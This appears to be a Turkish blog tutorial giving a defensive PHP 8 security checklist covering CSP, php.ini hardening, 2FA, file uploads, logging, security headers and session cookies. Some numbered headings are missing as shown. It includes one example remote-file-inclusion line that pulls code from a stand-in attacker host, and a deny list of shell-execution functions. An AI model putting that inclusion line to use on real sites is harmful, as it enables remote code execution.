PHP 8 Güvenliğinde Ustalık Sınıfı: 10 Nihai Kontrol Listesi
PHP 8 uygulamalarımızın güvenliği, kullanıcılarımızın verilerini korumak ve güvenlerini sürdürmek için en kritik konudur. Önceki bölümlerde öğrendiğimiz temel savunmalara ek olarak, şimdi de bir "usta" geliştiricinin uygulaması gereken gelişmiş güvenlik katmanlarına göz atacağız.Bu 10 madde, uygulamanızı bir sonraki güvenlik seviyesine taşıyacaktır.
1. İçerik Güvenlik Politikası (CSP) Kullanın
XSS (Cross-Site Scripting) saldırılarını engellemenin en güçlü yollarından biri CSP'dir. CSP, tarayıcıya "Bu sayfada sadece benim izin verdiğim kaynaklardan (script'ler, stiller, resimler) veri yükleyebilirsin" diyen bir HTTP başlığıdır.Bunu manuel yapmak zordur, ancak paragonie/PHP-CSP-Builder gibi kütüphanelerle çok kolaydır:
php:
use ParagonIE\CSPBuilder\CSPBuilder;
// Sadece kendi sitemizden ve cdnjs'den gelen scriptlere izin ver
$cspBuilder = new CSPBuilder();
$cspBuilder->allowSelf(); // Kendi domain'ine izin ver
$cspBuilder->addScriptSrc('https://cdnjs.cloudflare.com'); // CDN'e izin ver
$cspHeader = $cspBuilder->build();
header('Content-Security-Policy: ' . $cspHeader);2. Sunucu Zırhı: php.ini Ayarlarını Sertleştirin
Güvenlik, koddan önce sunucuda başlar. php.ini dosyanızda şu ayarları gözden geçirin:
- disable_functions: shell_exec, exec, system gibi tehlikeli olabilecek fonksiyonları devre dışı bırakın.
- open_basedir: PHP'nin sadece belirli bir dizin (örn: /var/www/uploads/) içinde dosya işlemi yapabilmesini sağlayın. Bu, sunucudaki diğer dizinlere sızmasını engeller.
- allow_url_fopen: false yapın. Bu, include 'http://saldirgan.com/virus.txt' gibi uzaktan dosya dahil etme (RFI) saldırılarını engeller.
Kullanıcı adı ve şifre yeterli değildir. Şifre sızdırılsa bile, 2FA (Google Authenticator gibi) ikinci bir kalkan sağlar. robthree/twofactorauth gibi kütüphanelerle PHP 8 uygulamanıza 2FA eklemek artık çok kolay. Bu, lüks değil, bir gerekliliktir.
4. Tekrar Altını Çizelim: Güvenli Dosya Yükleme
Bu o kadar kritik ki, bir kez daha vurgulamak şart:- Whitelist (Beyaz Liste): Sadece izin verdiğiniz (image/jpeg, application/pdf) dosya türlerini kabul edin.
- Benzersiz İsim: Dosyaya uniqid() veya random_bytes() ile oluşturulmuş benzersiz bir isim verin.
- Web Root Dışına Kayıt: Yüklenen dosyaları public_html (veya www) klasörünün dışına kaydedin ve özel bir script ile sunun.
5. Gözünüzü Dört Açın: Denetim (Audit) ve Kayıt (Log) Takibi
Kodunuzu yazdınız ve bitti mi? Hayır.- Düzenli Denetim: Kodunuzu OWASP ZAP veya Nessus gibi otomatik güvenlik tarayıcıları ile düzenli olarak taratın.
- Log Takibi: Sunucu loglarını (access.log, error.log) düzenli olarak izleyin. Şüpheli bir IP'den sürekli 404 hatası alıyorsanız veya garip POST istekleri görüyorsanız, biri kapınızı zorluyor demektir. Anormal aktiviteler için alarmlar kurun.
CSP dışında, tarayıcıyı güvende tutan başka başlıklar da vardır:
- Strict-Transport-Security (HSTS): Tarayıcıya "Benimle 1 yıl boyunca SADECE HTTPS üzerinden konuş" der. Araya girmeyi (MITM) engeller.
- X-Content-Type-Options: Tarayıcının dosya türünü "koklamasını" engeller.
- X-Frame-Options: Sitenizin başka bir site içinde <iframe> ile çağrılmasını (Clickjacking) engeller.
Bir önceki konumuzdu ama bu listenin olmazsa olmazı. session_start() yapmadan önce session_set_cookie_params ile şu ayarları mutlaka yapın:
- secure (true): Sadece HTTPS üzerinden.
- httponly (true): JavaScript erişemez (XSS kalkanı).
- samesite ('Lax' veya 'Strict'): CSRF kalkanı.
Siz kodunuzu mükemmel yazmış olabilirsiniz, ancak kullandığınız üçüncü parti bir kütüphanede (composer ile çektiğiniz) bir açık olabilir. composer update komutunu düzenli olarak çalıştırarak tüm bağımlılıklarınızı güncel tutun.
